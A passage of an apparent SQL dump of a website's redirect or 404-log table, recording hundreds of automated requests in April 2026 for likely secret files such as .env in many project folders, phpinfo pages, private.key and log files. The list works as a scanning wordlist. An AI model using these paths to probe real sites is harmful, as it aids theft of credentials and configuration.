00:00:00',301),(62034,'https://www.3s-technologies.com.tr/en/info4.php',NULL,'','',1,0,'2026-04-12 10:40:13','0000-00-00 00:00:00',301),(62035,'https://www.3s-technologies.com.tr/en/ini.php',NULL,'','',1,0,'2026-04-12 10:40:15','0000-00-00 00:00:00',301),(62036,'https://www.3s-technologies.com.tr/en/install/.env',NULL,'','',1,0,'2026-04-12 10:40:15','0000-00-00 00:00:00',301),(62037,'https://www.3s-technologies.com.tr/en/instantcv/server/.env',NULL,'','',1,0,'2026-04-12 10:40:16','0000-00-00 00:00:00',301),(62038,'https://www.3s-technologies.com.tr/en/internal-api',NULL,'','',1,0,'2026-04-12 10:40:16','0000-00-00 00:00:00',301),(62039,'https://www.3s-technologies.com.tr/en/internal',NULL,'','',1,0,'2026-04-12 10:40:17','0000-00-00 00:00:00',301),(62040,'https://www.3s-technologies.com.tr/en/internal/config',NULL,'','',1,0,'2026-04-12 10:40:17','0000-00-00 00:00:00',301),(62041,'https://www.3s-technologies.com.tr/en/isadmin.php',NULL,'','',1,0,'2026-04-12 10:40:17','0000-00-00 00:00:00',301),(62042,'https://www.3s-technologies.com.tr/en/items/.env',NULL,'','',1,0,'2026-04-12 10:40:18','0000-00-00 00:00:00',301),(62043,'https://www.3s-technologies.com.tr/en/javascript/.env',NULL,'','',1,0,'2026-04-12 10:40:18','0000-00-00 00:00:00',301),(62044,'https://www.3s-technologies.com.tr/en/jenkins/.env',NULL,'','',1,0,'2026-04-12 10:40:18','0000-00-00 00:00:00',301),(62045,'https://www.3s-technologies.com.tr/en/jo.php',NULL,'','',1,0,'2026-04-12 10:40:19','0000-00-00 00:00:00',301),(62046,'https://www.3s-technologies.com.tr/en/joomla/.env',NULL,'','',1,0,'2026-04-12 10:40:19','0000-00-00 00:00:00',301),(62047,'https://www.3s-technologies.com.tr/en/js-plugin/.env',NULL,'','',1,0,'2026-04-12 10:40:20','0000-00-00 00:00:00',301),(62048,'https://www.3s-technologies.com.tr/en/js/app.[hash].js',NULL,'','',1,0,'2026-04-12 10:40:20','0000-00-00 00:00:00',301),(62049,'https://www.3s-technologies.com.tr/en/js/app.bundle.min.js',NULL,'','',1,0,'2026-04-12 10:40:21','0000-00-00 00:00:00',301),(62050,'https://www.3s-technologies.com.tr/en/js/chunk-79be581b.c4b0f5e4.js',NULL,'','',1,0,'2026-04-12 10:40:21','0000-00-00 00:00:00',301),(62051,'https://www.3s-technologies.com.tr/en/js/chunk-vendors.[hash].js',NULL,'','',1,0,'2026-04-12 10:40:22','0000-00-00 00:00:00',301),(62052,'https://www.3s-technologies.com.tr/en/js/chunks/[chunk-name].[hash].js',NULL,'','',1,0,'2026-04-12 10:40:22','0000-00-00 00:00:00',301),(62053,'https://www.3s-technologies.com.tr/en/js/contact_me.js',NULL,'','',1,0,'2026-04-12 10:40:23','0000-00-00 00:00:00',301),(62054,'https://www.3s-technologies.com.tr/en/js/vendor.[hash].js',NULL,'','',1,0,'2026-04-12 10:40:23','0000-00-00 00:00:00',301),(62055,'https://www.3s-technologies.com.tr/en/jsrelay/.env',NULL,'','',1,0,'2026-04-12 10:40:24','0000-00-00 00:00:00',301),(62056,'https://www.3s-technologies.com.tr/en/jupyter/.env',NULL,'','',1,0,'2026-04-12 10:40:24','0000-00-00 00:00:00',301),(62057,'https://www.3s-technologies.com.tr/en/khanlinks/.env',NULL,'','',1,0,'2026-04-12 10:40:25','0000-00-00 00:00:00',301),(62058,'https://www.3s-technologies.com.tr/en/kibana/.env',NULL,'','',1,0,'2026-04-12 10:40:25','0000-00-00 00:00:00',301),(62059,'https://www.3s-technologies.com.tr/en/kodenames-server/.env',NULL,'','',1,0,'2026-04-12 10:40:26','0000-00-00 00:00:00',301),(62060,'https://www.3s-technologies.com.tr/en/kolab-syncroton/.env',NULL,'','',1,0,'2026-04-12 10:40:26','0000-00-00 00:00:00',301),(62061,'https://www.3s-technologies.com.tr/en/kubernetes/.env',NULL,'','',1,0,'2026-04-12 10:40:27','0000-00-00 00:00:00',301),(62062,'https://www.3s-technologies.com.tr/en/l.php',NULL,'','',1,0,'2026-04-12 10:40:27','0000-00-00 00:00:00',301),(62063,'https://www.3s-technologies.com.tr/en/lab/.env',NULL,'','',1,0,'2026-04-12 10:40:27','0000-00-00 00:00:00',301),(62064,'https://www.3s-technologies.com.tr/en/lambda/.env',NULL,'','',1,0,'2026-04-12 10:40:28','0000-00-00 00:00:00',301),(62065,'https://www.3s-technologies.com.tr/en/latest/.env',NULL,'','',1,0,'2026-04-12 10:40:28','0000-00-00 00:00:00',301),(62066,'https://www.3s-technologies.com.tr/en/layout/.env',NULL,'','',1,0,'2026-04-12 10:40:29','0000-00-00 00:00:00',301),(62067,'https://www.3s-technologies.com.tr/en/lcomernbootcamp/projbackend/.env',NULL,'','',1,0,'2026-04-12 10:40:29','0000-00-00 00:00:00',301),(62068,'https://www.3s-technologies.com.tr/en/leafer-app/.env',NULL,'','',1,0,'2026-04-12 10:40:30','0000-00-00 00:00:00',301),(62069,'https://www.3s-technologies.com.tr/en/ledger_sync/.env',NULL,'','',1,0,'2026-04-12 10:40:31','0000-00-00 00:00:00',301),(62070,'https://www.3s-technologies.com.tr/en/legal/.env',NULL,'','',1,0,'2026-04-12 10:40:32','0000-00-00 00:00:00',301),(62071,'https://www.3s-technologies.com.tr/en/lemonldap-ng-doc/.env',NULL,'','',1,0,'2026-04-12 10:40:32','0000-00-00 00:00:00',301),(62072,'https://www.3s-technologies.com.tr/en/lemonldap-ng-fr-doc/.env',NULL,'','',1,0,'2026-04-12 10:40:33','0000-00-00 00:00:00',301),(62073,'https://www.3s-technologies.com.tr/en/letsencrypt/.env',NULL,'','',1,0,'2026-04-12 10:40:33','0000-00-00 00:00:00',301),(62074,'https://www.3s-technologies.com.tr/en/lib/.env',NULL,'','',1,0,'2026-04-12 10:40:34','0000-00-00 00:00:00',301),(62075,'https://www.3s-technologies.com.tr/en/lib/config.js',NULL,'','',1,0,'2026-04-12 10:40:34','0000-00-00 00:00:00',301),(62076,'https://www.3s-technologies.com.tr/en/libraries/.env',NULL,'','',1,0,'2026-04-12 10:40:35','0000-00-00 00:00:00',301),(62077,'https://www.3s-technologies.com.tr/en/library/.env',NULL,'','',1,0,'2026-04-12 10:40:35','0000-00-00 00:00:00',301),(62078,'https://www.3s-technologies.com.tr/en/libs/.env',NULL,'','',1,0,'2026-04-12 10:40:36','0000-00-00 00:00:00',301),(62079,'https://www.3s-technologies.com.tr/en/lindex.php',NULL,'','',1,0,'2026-04-12 10:40:36','0000-00-00 00:00:00',301),(62080,'https://www.3s-technologies.com.tr/en/linux/.env',NULL,'','',1,0,'2026-04-12 10:40:37','0000-00-00 00:00:00',301),(62081,'https://www.3s-technologies.com.tr/en/local.settings.json',NULL,'','',1,0,'2026-04-12 10:40:38','0000-00-00 00:00:00',301),(62082,'https://www.3s-technologies.com.tr/en/localhost/.env',NULL,'','',1,0,'2026-04-12 10:40:38','0000-00-00 00:00:00',301),(62083,'https://www.3s-technologies.com.tr/en/locally/.env',NULL,'','',1,0,'2026-04-12 10:40:39','0000-00-00 00:00:00',301),(62084,'https://www.3s-technologies.com.tr/en/log.txt',NULL,'','',1,0,'2026-04-12 10:40:39','0000-00-00 00:00:00',301),(62085,'https://www.3s-technologies.com.tr/en/log/.env',NULL,'','',1,0,'2026-04-12 10:40:40','0000-00-00 00:00:00',301),(62086,'https://www.3s-technologies.com.tr/en/log/development.log',NULL,'','',1,0,'2026-04-12 10:40:40','0000-00-00 00:00:00',301),(62087,'https://www.3s-technologies.com.tr/en/logging/.env',NULL,'','',1,0,'2026-04-12 10:40:41','0000-00-00 00:00:00',301),(62088,'https://www.3s-technologies.com.tr/en/login',NULL,'','',1,0,'2026-04-12 10:40:41','0000-00-00 00:00:00',301),(62089,'https://www.3s-technologies.com.tr/en/login/.env',NULL,'','',1,0,'2026-04-12 10:40:42','0000-00-00 00:00:00',301),(62090,'https://www.3s-technologies.com.tr/en/logs/.env',NULL,'','',1,0,'2026-04-12 10:40:42','0000-00-00 00:00:00',301),(62091,'https://www.3s-technologies.com.tr/en/logs/access.log',NULL,'','',1,0,'2026-04-12 10:40:43','0000-00-00 00:00:00',301),(62092,'https://www.3s-technologies.com.tr/en/logs/app.log',NULL,'','',1,0,'2026-04-12 10:40:43','0000-00-00 00:00:00',301),(62093,'https://www.3s-technologies.com.tr/en/logs/error.log',NULL,'','',1,0,'2026-04-12 10:40:44','0000-00-00 00:00:00',301),(62094,'https://www.3s-technologies.com.tr/en/magento/.env',NULL,'','',1,0,'2026-04-12 10:40:44','0000-00-00 00:00:00',301),(62095,'https://www.3s-technologies.com.tr/en/mailinabox/.env',NULL,'','',1,0,'2026-04-12 10:40:45','0000-00-00 00:00:00',301),(62096,'https://www.3s-technologies.com.tr/en/main-es2015.3c3aa123423ff18c0b00.js',NULL,'','',1,0,'2026-04-12 10:40:45','0000-00-00 00:00:00',301),(62097,'https://www.3s-technologies.com.tr/en/main-es2018.96dcf91e05121e327dcb.js',NULL,'','',1,0,'2026-04-12 10:40:46','0000-00-00 00:00:00',301),(62098,'https://www.3s-technologies.com.tr/en/main-tdtotk7f.js',NULL,'','',1,0,'2026-04-12 10:40:46','0000-00-00 00:00:00',301),(62099,'https://www.3s-technologies.com.tr/en/main-wtcas2ao.js',NULL,'','',1,0,'2026-04-12 10:40:47','0000-00-00 00:00:00',301),(62100,'https://www.3s-technologies.com.tr/en/main.0ad61943313a734cc3ac.js',NULL,'','',1,0,'2026-04-12 10:40:47','0000-00-00 00:00:00',301),(62101,'https://www.3s-technologies.com.tr/en/main.2b8841d1a101dd041285.js',NULL,'','',1,0,'2026-04-12 10:40:47','0000-00-00 00:00:00',301),(62102,'https://www.3s-technologies.com.tr/en/main.35a08c25eb91de70487f.js',NULL,'','',1,0,'2026-04-12 10:40:48','0000-00-00 00:00:00',301),(62103,'https://www.3s-technologies.com.tr/en/main.457ddfd2b1341056.js',NULL,'','',1,0,'2026-04-12 10:40:48','0000-00-00 00:00:00',301),(62104,'https://www.3s-technologies.com.tr/en/main.48f1bbcf6201c5ea.js',NULL,'','',1,0,'2026-04-12 10:40:49','0000-00-00 00:00:00',301),(62105,'https://www.3s-technologies.com.tr/en/main.58a95e8d8659972f.js',NULL,'','',1,0,'2026-04-12 10:40:49','0000-00-00 00:00:00',301),(62106,'https://www.3s-technologies.com.tr/en/main.702787bb88cacd05b11d.js',NULL,'','',1,0,'2026-04-12 10:40:50','0000-00-00 00:00:00',301),(62107,'https://www.3s-technologies.com.tr/en/main.b610bd7c7b9b7a47.js',NULL,'','',1,0,'2026-04-12 10:40:50','0000-00-00 00:00:00',301),(62108,'https://www.3s-technologies.com.tr/en/main.js',NULL,'','',1,0,'2026-04-12 10:40:50','0000-00-00 00:00:00',301),(62109,'https://www.3s-technologies.com.tr/en/main.php',NULL,'','',1,0,'2026-04-12 10:40:51','0000-00-00 00:00:00',301),(62110,'https://www.3s-technologies.com.tr/en/main.yml',NULL,'','',1,0,'2026-04-12 10:40:51','0000-00-00 00:00:00',301),(62111,'https://www.3s-technologies.com.tr/en/main_user/.env',NULL,'','',1,0,'2026-04-12 10:40:52','0000-00-00 00:00:00',301),(62112,'https://www.3s-technologies.com.tr/en/makefile',NULL,'','',1,0,'2026-04-12 10:40:52','0000-00-00 00:00:00',301),(62113,'https://www.3s-technologies.com.tr/en/manifest.json',NULL,'','',1,0,'2026-04-12 10:40:52','0000-00-00 00:00:00',301),(62114,'https://www.3s-technologies.com.tr/en/manual/.env',NULL,'','',1,0,'2026-04-12 10:40:53','0000-00-00 00:00:00',301),(62115,'https://www.3s-technologies.com.tr/en/master/.env',NULL,'','',1,0,'2026-04-12 10:40:53','0000-00-00 00:00:00',301),(62116,'https://www.3s-technologies.com.tr/en/media/.env',NULL,'','',1,0,'2026-04-12 10:40:54','0000-00-00 00:00:00',301),(62117,'https://www.3s-technologies.com.tr/en/memcached/.env',NULL,'','',1,0,'2026-04-12 10:40:54','0000-00-00 00:00:00',301),(62118,'https://www.3s-technologies.com.tr/en/mentorg-lava-docker/.env',NULL,'','',1,0,'2026-04-12 10:40:55','0000-00-00 00:00:00',301),(62119,'https://www.3s-technologies.com.tr/en/micro-app-react-communication/.env',NULL,'','',1,0,'2026-04-12 10:40:55','0000-00-00 00:00:00',301),(62120,'https://www.3s-technologies.com.tr/en/micro-app-react/.env',NULL,'','',1,0,'2026-04-12 10:40:56','0000-00-00 00:00:00',301),(62121,'https://www.3s-technologies.com.tr/en/mindsweeper/gui/.env',NULL,'','',1,0,'2026-04-12 10:40:56','0000-00-00 00:00:00',301),(62122,'https://www.3s-technologies.com.tr/en/minified/.env',NULL,'','',1,0,'2026-04-12 10:40:57','0000-00-00 00:00:00',301),(62123,'https://www.3s-technologies.com.tr/en/misc/.env',NULL,'','',1,0,'2026-04-12 10:40:57','0000-00-00 00:00:00',301),(62124,'https://www.3s-technologies.com.tr/en/modix/clientapp/.env',NULL,'','',1,0,'2026-04-12 10:40:58','0000-00-00 00:00:00',301),(62125,'https://www.3s-technologies.com.tr/en/monerod/.env',NULL,'','',1,0,'2026-04-12 10:40:58','0000-00-00 00:00:00',301),(62126,'https://www.3s-technologies.com.tr/en/mongodb/config/dev/.env',NULL,'','',1,0,'2026-04-12 10:40:59','0000-00-00 00:00:00',301),(62127,'https://www.3s-technologies.com.tr/en/monitoring/compose/.env',NULL,'','',1,0,'2026-04-12 10:40:59','0000-00-00 00:00:00',301),(62128,'https://www.3s-technologies.com.tr/en/moodledata/.env',NULL,'','',1,0,'2026-04-12 10:41:00','0000-00-00 00:00:00',301),(62129,'https://www.3s-technologies.com.tr/en/msks/.env',NULL,'','',1,0,'2026-04-12 10:41:01','0000-00-00 00:00:00',301),(62130,'https://www.3s-technologies.com.tr/en/munki_repo/.env',NULL,'','',1,0,'2026-04-12 10:41:01','0000-00-00 00:00:00',301),(62131,'https://www.3s-technologies.com.tr/en/music/.env',NULL,'','',1,0,'2026-04-12 10:41:01','0000-00-00 00:00:00',301),(62132,'https://www.3s-technologies.com.tr/en/myrentals.web/clientapp/.env',NULL,'','',1,0,'2026-04-12 10:41:02','0000-00-00 00:00:00',301),(62133,'https://www.3s-technologies.com.tr/en/mysql',NULL,'','',1,0,'2026-04-12 10:41:02','0000-00-00 00:00:00',301),(62134,'https://www.3s-technologies.com.tr/en/name/.env',NULL,'','',1,0,'2026-04-12 10:41:03','0000-00-00 00:00:00',301),(62135,'https://www.3s-technologies.com.tr/en/nest/.env',NULL,'','',1,0,'2026-04-12 10:41:03','0000-00-00 00:00:00',301),(62136,'https://www.3s-technologies.com.tr/en/netlify.toml',NULL,'','',1,0,'2026-04-12 10:41:03','0000-00-00 00:00:00',301),(62137,'https://www.3s-technologies.com.tr/en/new-js/.env',NULL,'','',1,0,'2026-04-12 10:41:04','0000-00-00 00:00:00',301),(62138,'https://www.3s-technologies.com.tr/en/new.php',NULL,'','',1,0,'2026-04-12 10:41:04','0000-00-00 00:00:00',301),(62139,'https://www.3s-technologies.com.tr/en/news-app/.env',NULL,'','',1,0,'2026-04-12 10:41:05','0000-00-00 00:00:00',301),(62140,'https://www.3s-technologies.com.tr/en/next/.env',NULL,'','',1,0,'2026-04-12 10:41:05','0000-00-00 00:00:00',301),(62141,'https://www.3s-technologies.com.tr/en/nginx-server/.env',NULL,'','',1,0,'2026-04-12 10:41:06','0000-00-00 00:00:00',301),(62142,'https://www.3s-technologies.com.tr/en/niffler-frontend/.env',NULL,'','',1,0,'2026-04-12 10:41:06','0000-00-00 00:00:00',301),(62143,'https://www.3s-technologies.com.tr/en/node_modules/.env',NULL,'','',1,0,'2026-04-12 10:41:07','0000-00-00 00:00:00',301),(62144,'https://www.3s-technologies.com.tr/en/nodejs-projects/play-ground/login/.env',NULL,'','',1,0,'2026-04-12 10:41:07','0000-00-00 00:00:00',301),(62145,'https://www.3s-technologies.com.tr/en/nodejs-projects/play-ground/manageuserroles/.env',NULL,'','',1,0,'2026-04-12 10:41:08','0000-00-00 00:00:00',301),(62146,'https://www.3s-technologies.com.tr/en/novnc/.env',NULL,'','',1,0,'2026-04-12 10:41:08','0000-00-00 00:00:00',301),(62147,'https://www.3s-technologies.com.tr/en/now.json',NULL,'','',1,0,'2026-04-12 10:41:09','0000-00-00 00:00:00',301),(62148,'https://www.3s-technologies.com.tr/en/nuke.app.ui/.env',NULL,'','',1,0,'2026-04-12 10:41:09','0000-00-00 00:00:00',301),(62149,'https://www.3s-technologies.com.tr/en/nuxt/.env',NULL,'','',1,0,'2026-04-12 10:41:10','0000-00-00 00:00:00',301),(62150,'https://www.3s-technologies.com.tr/en/o.php',NULL,'','',1,0,'2026-04-12 10:41:10','0000-00-00 00:00:00',301),(62151,'https://www.3s-technologies.com.tr/en/ocp.php',NULL,'','',1,0,'2026-04-12 10:41:11','0000-00-00 00:00:00',301),(62152,'https://www.3s-technologies.com.tr/en/of.php',NULL,'','',1,0,'2026-04-12 10:41:11','0000-00-00 00:00:00',301),(62153,'https://www.3s-technologies.com.tr/en/old',NULL,'','',1,0,'2026-04-12 10:41:12','0000-00-00 00:00:00',301),(62154,'https://www.3s-technologies.com.tr/en/old/.env',NULL,'','',1,0,'2026-04-12 10:41:12','0000-00-00 00:00:00',301),(62155,'https://www.3s-technologies.com.tr/en/old_site',NULL,'','',1,0,'2026-04-12 10:41:13','0000-00-00 00:00:00',301),(62156,'https://www.3s-technologies.com.tr/en/oldsanta/.env',NULL,'','',1,0,'2026-04-12 10:41:14','0000-00-00 00:00:00',301),(62157,'https://www.3s-technologies.com.tr/en/opencart/.env',NULL,'','',1,0,'2026-04-12 10:41:15','0000-00-00 00:00:00',301),(62158,'https://www.3s-technologies.com.tr/en/ops/vagrant/.env',NULL,'','',1,0,'2026-04-12 10:41:15','0000-00-00 00:00:00',301),(62159,'https://www.3s-technologies.com.tr/en/option/.env',NULL,'','',1,0,'2026-04-12 10:41:16','0000-00-00 00:00:00',301),(62160,'https://www.3s-technologies.com.tr/en/orientdb-client/.env',NULL,'','',1,0,'2026-04-12 10:41:16','0000-00-00 00:00:00',301),(62161,'https://www.3s-technologies.com.tr/en/outputs/.env',NULL,'','',1,0,'2026-04-12 10:41:17','0000-00-00 00:00:00',301),(62162,'https://www.3s-technologies.com.tr/en/owncloud/.env',NULL,'','',1,0,'2026-04-12 10:41:17','0000-00-00 00:00:00',301),(62163,'https://www.3s-technologies.com.tr/en/p.php',NULL,'','',1,0,'2026-04-12 10:41:17','0000-00-00 00:00:00',301),(62164,'https://www.3s-technologies.com.tr/en/packages/styled-ui-docs/.env',NULL,'','',1,0,'2026-04-12 10:41:18','0000-00-00 00:00:00',301),(62165,'https://www.3s-technologies.com.tr/en/packages/web/.env',NULL,'','',1,0,'2026-04-12 10:41:18','0000-00-00 00:00:00',301),(62166,'https://www.3s-technologies.com.tr/en/packed/.env',NULL,'','',1,0,'2026-04-12 10:41:19','0000-00-00 00:00:00',301),(62167,'https://www.3s-technologies.com.tr/en/page-editor/.env',NULL,'','',1,0,'2026-04-12 10:41:19','0000-00-00 00:00:00',301),(62168,'https://www.3s-technologies.com.tr/en/panel/.env',NULL,'','',1,0,'2026-04-12 10:41:20','0000-00-00 00:00:00',301),(62169,'https://www.3s-technologies.com.tr/en/parity/.env',NULL,'','',1,0,'2026-04-12 10:41:20','0000-00-00 00:00:00',301),(62170,'https://www.3s-technologies.com.tr/en/passportjs/.env',NULL,'','',1,0,'2026-04-12 10:41:21','0000-00-00 00:00:00',301),(62171,'https://www.3s-technologies.com.tr/en/patchwork/.env',NULL,'','',1,0,'2026-04-12 10:41:21','0000-00-00 00:00:00',301),(62172,'https://www.3s-technologies.com.tr/en/path/.env',NULL,'','',1,0,'2026-04-12 10:41:22','0000-00-00 00:00:00',301),(62173,'https://www.3s-technologies.com.tr/en/pfbe/.env',NULL,'','',1,0,'2026-04-12 10:41:22','0000-00-00 00:00:00',301),(62174,'https://www.3s-technologies.com.tr/en/php.php',NULL,'','',1,0,'2026-04-12 10:41:22','0000-00-00 00:00:00',301),(62175,'https://www.3s-technologies.com.tr/en/php1.php',NULL,'','',1,0,'2026-04-12 10:41:23','0000-00-00 00:00:00',301),(62176,'https://www.3s-technologies.com.tr/en/php52/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:41:23','0000-00-00 00:00:00',301),(62177,'https://www.3s-technologies.com.tr/en/phpcustom_info/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:41:24','0000-00-00 00:00:00',301),(62178,'https://www.3s-technologies.com.tr/en/phpinfo.html',NULL,'','',1,0,'2026-04-12 10:41:25','0000-00-00 00:00:00',301),(62179,'https://www.3s-technologies.com.tr/en/phpinfo.txt',NULL,'','',1,0,'2026-04-12 10:41:26','0000-00-00 00:00:00',301),(62180,'https://www.3s-technologies.com.tr/en/phpinfo/info.php',NULL,'','',1,0,'2026-04-12 10:41:27','0000-00-00 00:00:00',301),(62181,'https://www.3s-technologies.com.tr/en/phpinfo/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:41:27','0000-00-00 00:00:00',301),(62182,'https://www.3s-technologies.com.tr/en/phpinfo1.php',NULL,'','',1,0,'2026-04-12 10:41:28','0000-00-00 00:00:00',301),(62183,'https://www.3s-technologies.com.tr/en/phpinfo2.php',NULL,'','',1,0,'2026-04-12 10:41:28','0000-00-00 00:00:00',301),(62184,'https://www.3s-technologies.com.tr/en/phpinfo3.php',NULL,'','',1,0,'2026-04-12 10:41:29','0000-00-00 00:00:00',301),(62185,'https://www.3s-technologies.com.tr/en/phpinfo4.php',NULL,'','',1,0,'2026-04-12 10:41:29','0000-00-00 00:00:00',301),(62186,'https://www.3s-technologies.com.tr/en/phpinfodev.php',NULL,'','',1,0,'2026-04-12 10:41:30','0000-00-00 00:00:00',301),(62187,'https://www.3s-technologies.com.tr/en/phpmyadmin',NULL,'','',1,0,'2026-04-12 10:41:31','0000-00-00 00:00:00',301),(62188,'https://www.3s-technologies.com.tr/en/phpsysinfo',NULL,'','',1,0,'2026-04-12 10:41:31','0000-00-00 00:00:00',301),(62189,'https://www.3s-technologies.com.tr/en/phpsysinfo.php',NULL,'','',1,0,'2026-04-12 10:41:32','0000-00-00 00:00:00',301),(62190,'https://www.3s-technologies.com.tr/en/phpsysinfo/info.php',NULL,'','',1,0,'2026-04-12 10:41:32','0000-00-00 00:00:00',301),(62191,'https://www.3s-technologies.com.tr/en/phpsysinfo/phpinfo.php',NULL,'','',1,0,'2026-04-12 10:41:32','0000-00-00 00:00:00',301),(62192,'https://www.3s-technologies.com.tr/en/phpsysinfo/phpsysinfo.php',NULL,'','',1,0,'2026-04-12 10:41:33','0000-00-00 00:00:00',301),(62193,'https://www.3s-technologies.com.tr/en/phptest.php',NULL,'','',1,0,'2026-04-12 10:41:33','0000-00-00 00:00:00',301),(62194,'https://www.3s-technologies.com.tr/en/pi.php5',NULL,'','',1,0,'2026-04-12 10:41:34','0000-00-00 00:00:00',301),(62195,'https://www.3s-technologies.com.tr/en/pictures/.env',NULL,'','',1,0,'2026-04-12 10:41:35','0000-00-00 00:00:00',301),(62196,'https://www.3s-technologies.com.tr/en/platform/.env',NULL,'','',1,0,'2026-04-12 10:41:35','0000-00-00 00:00:00',301),(62197,'https://www.3s-technologies.com.tr/en/playground/.env',NULL,'','',1,0,'2026-04-12 10:41:36','0000-00-00 00:00:00',301),(62198,'https://www.3s-technologies.com.tr/en/plugin_static/.env',NULL,'','',1,0,'2026-04-12 10:41:36','0000-00-00 00:00:00',301),(62199,'https://www.3s-technologies.com.tr/en/plugins/.env',NULL,'','',1,0,'2026-04-12 10:41:37','0000-00-00 00:00:00',301),(62200,'https://www.3s-technologies.com.tr/en/post-deployment/.vscode/.env',NULL,'','',1,0,'2026-04-12 10:41:37','0000-00-00 00:00:00',301),(62201,'https://www.3s-technologies.com.tr/en/postfixadmin/.env',NULL,'','',1,0,'2026-04-12 10:41:38','0000-00-00 00:00:00',301),(62202,'https://www.3s-technologies.com.tr/en/prestashop/.env',NULL,'','',1,0,'2026-04-12 10:41:38','0000-00-00 00:00:00',301),(62203,'https://www.3s-technologies.com.tr/en/preview-env/.env',NULL,'','',1,0,'2026-04-12 10:41:39','0000-00-00 00:00:00',301),(62204,'https://www.3s-technologies.com.tr/en/preview/.env',NULL,'','',1,0,'2026-04-12 10:41:39','0000-00-00 00:00:00',301),(62205,'https://www.3s-technologies.com.tr/en/price_hawk_client/.env',NULL,'','',1,0,'2026-04-12 10:41:40','0000-00-00 00:00:00',301),(62206,'https://www.3s-technologies.com.tr/en/prisma/.env',NULL,'','',1,0,'2026-04-12 10:41:40','0000-00-00 00:00:00',301),(62207,'https://www.3s-technologies.com.tr/en/private.key',NULL,'','',1,0,'2026-04-12 10:41:41','0000-00-00 00:00:00',301),(62208,'https://www.3s-technologies.com.tr/en/processor/.env',NULL,'','',1,0,'2026-04-12 10:41:41','0000-00-00 00:00:00',301),(62209,'https://www.3s-technologies.com.tr/en/procfile',NULL,'','',1,0,'2026-04-12 10:41:42','0000-00-00 00:00:00',301),(62210,'https://www.3s-technologies.com.tr/en/product/.env.staging',NULL,'','',1,0,'2026-04-12 10:41:43','0000-00-00 00:00:00',301),(62211,'https://www.3s-technologies.com.tr/en/projbackend/.env',NULL,'','',1,0,'2026-04-12 10:41:44','0000-00-00 00:00:00',301),(62212,'https://www.3s-technologies.com.tr/en/project/.env',NULL,'','',1,0,'2026-04-12 10:41:44','0000-00-00 00:00:00',301),(62213,'https://www.3s-technologies.com.tr/en/project_root/.env',NULL,'','',1,0,'2026-04-12 10:41:45','0000-00-00 00:00:00',301),(62214,'https://www.3s-technologies.com.tr/en/protected/.env',NULL,'','',1,0,'2026-04-12 10:41:45','0000-00-00 00:00:00',301),(62215,'https://www.3s-technologies.com.tr/en/psnlink/.env',NULL,'','',1,0,'2026-04-12 10:41:46','0000-00-00 00:00:00',301),(62216,'https://www.3s-technologies.com.tr/en/pt2/countries/src/.env',NULL,'','',1,0,'2026-04-12 10:41:46','0000-00-00 00:00:00',301),(62217,'https://www.3s-technologies.com.tr/en/pt8/library-backend-gql/.env',NULL,'','',1,0,'2026-04-12 10:41:47','0000-00-00 00:00:00',301),(62218,'https://www.3s-technologies.com.tr/en/pub/.env',NULL,'','',1,0,'2026-04-12 10:41:47','0000-00-00 00:00:00',301),(62219,'https://www.3s-technologies.com.tr/en/public/system',NULL,'','',1,0,'2026-04-12 10:41:47','0000-00-00 00:00:00',301),(62220,'https://www.3s-technologies.com.tr/en/public_html/.env',NULL,'','',1,0,'2026-04-12 10:41:48','0000-00-00 00:00:00',301),(62221,'https://www.3s-technologies.com.tr/en/public_root/.env',NULL,'','',1,0,'2026-04-12 10:41:48','0000-00-00 00:00:00',301),(62222,'https://www.3s-technologies.com.tr/en/q.php',NULL,'','',1,0,'2026-04-12 10:41:48','0000-00-00 00:00:00',301),(62223,'https://www.3s-technologies.com.tr/en/qq.php',NULL,'','',1,0,'2026-04-12 10:41:49','0000-00-00 00:00:00',301),(62224,'https://www.3s-technologies.com.tr/en/question2/.env',NULL,'','',1,0,'2026-04-12 10:41:49','0000-00-00 00:00:00',301),(62225,'https://www.3s-technologies.com.tr/en/qv-frontend/.env',NULL,'','',1,0,'2026-04-12 10:41:50','0000-00-00 00:00:00',301),(62226,'https://www.3s-technologies.com.tr/en/rabbitmq-cluster/.env',NULL,'','',1,0,'2026-04-12 10:41:50','0000-00-00 00:00:00',301),(62227,'https://www.3s-technologies.com.tr/en/rails-api/react-app/.env',NULL,'','',1,0,'2026-04-12 10:41:51','0000-00-00 00:00:00',301),(62228,'https://www.3s-technologies.com.tr/en/rails/.env',NULL,'','',1,0,'2026-04-12 10:41:51','0000-00-00 00:00:00',301),(62229,'https://www.3s-technologies.com.tr/en/rasax/.env',NULL,'','',1,0,'2026-04-12 10:41:52','0000-00-00 00:00:00',301),(62230,'https://www.3s-technologies.com.tr/en/react/.env',NULL,'','',1,0,'2026-04-12 10:41:52','0000-00-00 00:00:00',301),(62231,'https://www.3s-technologies.com.tr/en/react_todo/.env',NULL,'','',1,0,'2026-04-12 10:41:53','0000-00-00 00:00:00',301),(62232,'https://www.3s-technologies.com.tr/en/redmine/.env',NULL,'','',1,0,'2026-04-12 10:41:53','0000-00-00 00:00:00',301),(62233,'https://www.3s-technologies.com.tr/en/repo/.env',NULL,'','',1,0,'2026-04-12 10:41:54','0000-00-00 00:00:00',301),(62234,'https://www.3s-technologies.com.tr/en/repos/.env',NULL,'','',1,0,'2026-04-12 10:41:54','0000-00-00 00:00:00',301),(62235,'https://www.3s-technologies.com.tr/en/repository/.env',NULL,'','',1,0,'2026-04-12 10:41:55','0000-00-00 00:00:00',301),(62236,'https://www.3s-technologies.com.tr/en/resources/.env',NULL,'','',1,0,'2026-04-12 10:41:55','0000-00-00 00:00:00',301),(62237,'https://www.3s-technologies.com.tr/en/resources/docker/.env',NULL,'','',1,0,'2026-04-12 10:41:56','0000-00-00 00:00:00',301),(62238,'https://www.3s-technologies.com.tr/en/resources/docker/mysql/.env',NULL,'','',1,0,'2026-04-12 10:41:56','0000-00-00 00:00:00',301),(62239,'https://www.3s-technologies.com.tr/en/resources/docker/phpmyadmin/.env',NULL,'','',1,0,'2026-04-12 10:41:57','0000-00-00 00:00:00',301),(62240,'https://www.3s-technologies.com.tr/en/resources/docker/rabbitmq/.env',NULL,'','',1,0,'2026-04-12 10:41:57','0000-00-00 00:00:00',301),(62241,'https://www.3s-technologies.com.tr/en/resources/docker/rediscommander/.env',NULL,'','',1,0,'2026-04-12 10:41:58','0000-00-00 00:00:00',301),(62242,'https://www.3s-technologies.com.tr/en/resourcesync/.env',NULL,'','',1,0,'2026-04-12 10:41:58','0000-00-00 